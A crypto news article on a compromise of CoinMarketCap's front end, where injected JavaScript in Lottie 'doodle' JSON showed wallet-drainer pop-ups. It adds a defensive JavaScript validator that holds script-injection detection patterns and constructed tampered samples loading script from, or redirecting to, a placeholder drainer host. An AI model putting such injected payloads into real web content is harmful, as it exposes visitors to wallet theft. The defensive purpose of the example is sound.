Key takeaways
- CoinMarketCap's front end was compromised, displaying unauthorized wallet-verification pop-ups to users.
- The breach exploited a backend API vulnerability tied to the platform's doodles feature; an investigation is in progress.
CoinMarketCap's front end was compromised on June 20, with its web page displaying unauthorized pop-up messages asking visitors to verify their crypto wallets. The malicious pop-up was first reported by several members of the crypto community.
The platform's team confirmed the incident and warned users not to connect their wallets while it investigates and works to resolve the issue.
🚨 Security alert
We are aware that a malicious pop-up prompting users to “verify wallet” has appeared on our site.
⚠️ Do not connect your wallet.
Our team is actively investigating and working to resolve the issue.
– CoinMarketCap (@CoinMarketCap) June 20, 2025
Blockchain security firm Coinspect Security found that the CoinMarketCap backend API was serving manipulated JSON data that injected malicious JavaScript through the site's rotating “doodles” feature.
🚨 The CoinMarketCap backend API is serving manipulated JSON data that injects malicious JavaScript via the rotating “doodles” feature. Not all users see it, because the doodle displayed varies by visit. The injected wallet drainer always triggers if you visit /doodles/ pic.twitter.com/13o9ab7jlw
– Coinspect Security (@coinspect) June 20, 2025
Yes, the CoinMarketCap drainer loaded from a “doodle” JSON file. Lottie is a JSON-based animation file format that lets designers easily ship animations to any platform. We are investigating this injection vector, and other websites and dApps should consider it too.
– Coinspect Security (@coinspect) June 20, 2025
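Because the vector described above is animation JSON served by a backend API and rendered in the browser, here is an added example (not CoinMarketCap's or Coinspect's code) of treating such a doodle payload as untrusted input before it reaches the animation player. It assumes the doodle is a Lottie JSON document rendered by a player that evaluates Lottie expression strings; the sample payloads and the `drainer.invalid` host are constructed.

```javascript
// Added example, not CoinMarketCap's or Coinspect's code. Assumes the "doodle"
// is a Lottie JSON animation fetched from a backend API. The JSON is treated as
// untrusted: known top-level keys only, no HTML or script fragments in any
// string, and no Lottie expression strings ("x" keys), which expression-capable
// players evaluate as JavaScript.
const ALLOWED_TOP_LEVEL = new Set([
  "v", "fr", "ip", "op", "w", "h", "nm", "ddd", "assets", "layers", "markers", "meta",
]);
// Heuristics for content that has no business inside animation data.
const SUSPICIOUS = [/<\s*(script|iframe|img|svg|object|embed)/i, /javascript:/i,
  /\bon\w+\s*=/i, /\beval\s*\(/, /\b(document|window)\./];

// Walk the parsed document and collect every path that violates the rules.
function findViolations(node, path = "$") {
  const out = [];
  if (typeof node === "string") {
    for (const re of SUSPICIOUS) if (re.test(node)) out.push(`${path}: matches ${re}`);
  } else if (Array.isArray(node)) {
    node.forEach((v, i) => out.push(...findViolations(v, `${path}[${i}]`)));
  } else if (node && typeof node === "object") {
    for (const [k, v] of Object.entries(node)) {
      if (k === "x" && typeof v === "string") out.push(`${path}.x: expression string`);
      out.push(...findViolations(v, `${path}.${k}`));
    }
  }
  return out;
}

// Validate raw JSON text from the API; only a clean document is handed to the player.
function validateDoodle(jsonText, maxBytes = 512 * 1024) {
  if (jsonText.length > maxBytes) return { ok: false, violations: ["payload too large"], doc: null };
  let doc;
  try { doc = JSON.parse(jsonText); } catch { return { ok: false, violations: ["invalid JSON"], doc: null }; }
  if (!doc || typeof doc !== "object" || Array.isArray(doc)) {
    return { ok: false, violations: ["root is not an object"], doc: null };
  }
  const violations = Object.keys(doc)
    .filter((k) => !ALLOWED_TOP_LEVEL.has(k)).map((k) => `$.${k}: unexpected top-level key`);
  if (!Array.isArray(doc.layers)) violations.push("$.layers: missing or not an array");
  violations.push(...findViolations(doc));
  return { ok: violations.length === 0, violations, doc: violations.length === 0 ? doc : null };
}

// Constructed sample payloads (not taken from the incident).
const BENIGN_DOODLE = JSON.stringify({ v: "5.7.4", fr: 30, ip: 0, op: 60, w: 200, h: 200, nm: "doodle",
  assets: [], layers: [{ ty: 4, nm: "star", ks: { o: { a: 0, k: 100 } } }] });
const TAMPERED_DOODLE = JSON.stringify({ v: "5.7.4", fr: 30, ip: 0, op: 60, w: 200, h: 200,
  nm: "<script src='https://drainer.invalid/d.js'></script>", layers: [] });
const EXPRESSION_DOODLE = JSON.stringify({ v: "5.7.4", fr: 30, ip: 0, op: 60, w: 200, h: 200, nm: "d",
  layers: [{ ty: 4, ks: { o: { a: 0, k: 100, x: "window.location = 'https://drainer.invalid'" } } }] });
```

A Content Security Policy that forbids inline scripts and unknown script origins is the complementary control: even if a tampered doodle slips through, the injected code has nowhere to run.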
Also today, Crypto Briefing noticed signs of a similar security incident on another popular crypto website.


The web page displayed a pop-up advertising an “exclusive” opportunity, distinct from the CoinMarketCap incident but likewise prompting visitors to connect their wallets to claim an airdrop.
Crypto Briefing could not confirm whether the site's front end was compromised, since the suspicious behavior appeared to last only about five minutes. The site quickly returned to normal and the pop-up was no longer visible.
The breach follows a Cybernews cybersecurity report revealing 16 billion passwords exposed in one of the largest data breaches in history, affecting access to major platforms including Facebook, Google and Apple.
Experts recommend that users update the passwords for all their main accounts, especially those connected to sensitive services such as work platforms. Users are strongly advised to use a password manager to generate strong, unique passwords for each account.
Additional security measures, including enabling two-factor authentication (2FA) and closely monitoring authentication activity, should also be considered.